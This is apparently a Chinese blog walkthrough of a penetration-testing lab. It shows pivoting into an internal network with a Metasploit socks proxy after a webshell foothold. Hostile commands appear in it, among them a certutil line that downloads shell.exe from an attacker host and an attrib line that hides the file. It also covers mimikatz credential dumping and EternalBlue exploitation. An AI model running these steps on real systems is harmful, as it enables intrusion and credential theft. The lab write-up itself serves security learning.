内网渗透测试 MSF搭建socks代理

已于 2022-11-06 21:18:54 修改
阅读量2.5k 收藏 13
点赞数 1
文章标签: 服务器 运维 web安全 网络安全
于 2022-10-14 20:09:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63028223/article/details/127322032
版权

环境搭建:

最终效果为如此,web服务器可以ping通外网和内网两台服务器

 

 

外网打点

信息收集

发现端口:

80 http

3306 mysql

敏感目录:

/phpMyadmin

数据库弱口令 root root

通过日志功能getshell

现在咱们查询一下日志功能是否开启,默认是关闭的。

show variables like "general_log%";

开启日志功能

命令行 set globalgeneral_log='on';

图形化:

修改日志保存路径:

输入一句话木马并执行,使日志保存一句话木马。

拿到shell权限。

 

稳定权限

​
certutil -urlcache -split -f http://192.168.x.xxx/shell.exe

​

将文件设置为隐藏文件

 attrib shell.exe +s +h

内网信息探测:

msf的马子让cs去接受。

 可以看到cs这里已经成功上线

 先提权:

可以看到已经多了一个system用户。

内网渗透

mimikatz工具抓取本机用户名密码: 

查看域下其他主机 

回到msf

route查看路由表

结合cs获得的内网主机信息可以得到 内网的网段为 192.168.52.0/24

socks代理

 加入路由表 (1是session值)route add 192.168.52.0 255.255.255.0 1

输出路由表信息 route print

 run autoroute -s 10.10.10.0/24

 

(加入到路由表是搭建内网转发socks代理的前提之一)

使用代理模块

 并设置参数

jobs一下查看到存在 jobs值便说明代理设置成功。

 配置etc/proxychains4.conf

Proxychains +命令

 

成功将kali的流量转发的内网中。 

关一下防火墙 

我这里直接就关了,如果没有成功可以提一下权到system 

探测到内网主机138主机开放445端口

使用msf的永恒之蓝模块

 

余下的一台内网主机,如法炮制。

至此整个目标域网络拿下。 

一个番茄锅
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
项目管理利刃之MSF
03-03
火龙果软件工程技术心  MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理的实际应用进行讲解,如果您是软件项目的参与者,如项目经理、开发工程师、系统架构师、顾问、质量管理人员等,想找到项目管理遇到问题的解决方案,相信本文会给您一定的帮助。MSF为成功地规划、设计、开发和部署IT解决方案提供了一套成熟的方法论。与具有固定框架的方法相反,MSF提供了一个可以伸缩的灵活框架,以满足任何规模的组织或者项目开发团队的需要。MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
MSF配置代理转发
j13373960206的博客
07-13 640
现在可以将主机1 设置成代理转发模式,也就是ms将数据包发送给主机1 ,主机1 再将数据包发送给主机2 ,以此来完成控制主机2。1、getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管 道。2、getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。此时在msf和主机2之间有主机1 ,而且主机1 已经被我们所控制(成功上线)2、修改配置文件,指定使用kail的配置的代理服务。在被入侵的主机上,执行后门后,此时会发现上线成功。
msf添加路由及socks代理进行内网穿透
最新发布
2301_76227305的博客
02-21 1030
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Socks代理
weixin_51151498的博客
07-19 1032
全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080。
利用MSF设置代理
Continuejww的博客
11-10 794
通过MSF拿到一个机器的权限后,通过MSF搭建socks代理,然后通内网。拿到目标权限,有很多方法,比如:①ms17-010 ②补丁漏洞 ③MSF生成后门在此直接使用MSF生成后门MSF有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理socks5可以设置用户名和密码;新版本的MSF已经整合了socks代理,在模块模块直接设置。
内网安全代理技术详解
qq_61553520的博客
06-03 7619
本篇将介绍在内网攻防经常用到的代理技术,正向连接,反向连接。
MSF开启socks代理内网渗透
The current road is different, love needs to distinguish between right and wrong
04-25 5576
简介 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网MSF有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。 测试环境 kali: 192.168.95.128 windows7: 192.168.95.169 ; 192.168.70.3 server2012: 192.168.70.2
浅谈MSF渗透测试
02-24
在渗透过程MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架...下面小白总结了一下在渗透测试,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
msf 渗透测试
06-05
msf渗透
移动端渗透测试框架MSF
09-24
移动端渗透测试框架Mobile-Security-Framework-MobSF-master,可以搭建完成后进行移动端渗透测试
msf内网渗透
10-29
msf内网渗透
cobaltstrike攻击流程,联动msfsocks代理
cc777777777的博客
05-15 915
cobaltstrike攻击流程,联动msfsocks代理
内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
热门推荐
不知名白帽的博客
09-18 1万+
内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 6437
内网添加路由主要是`充当跳板`功能, 其实是MSF框架自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网的路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
内网安全Socks 代理 || 本地代理 技术.
网络安全领域___专研者.
06-12 5556
Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.
内网渗透-代理Socks协议+路由不出网+后渗透通讯+CS-MSF控制上线
xiaoheizi的博客
11-07 600
思路:在win2008(192.168.11.136)执行正向连接的木马程序,然后让win10(192.168.11.129)去主动连接win2008(192.168.11.136),连接成功后,因为win10是已经被我们控制了的,所以win2008也就被控制了。1.拿下一台主机权限后,右键——代理转发——socks server——开始,建立节点。6.双击启动浏览器,成功使用我们的外网主机访问到了目标内网,实现了网络通讯。下载:https://www.17uoo.com/game/4226/
内网渗透——Metasploit的代理转发
m0_65544268的博客
07-10 561
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
msf 关闭socks5代理
06-06
要关闭 Metasploit Framework (MSF) 的 SOCKS5 代理,可以使用以下命令: ``` unset all_proxy ``` 这将删除当前会话设置的 SOCKS5 代理。如果您想永久删除这些代理设置,可以编辑您的环境变量文件(例如 ~/....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值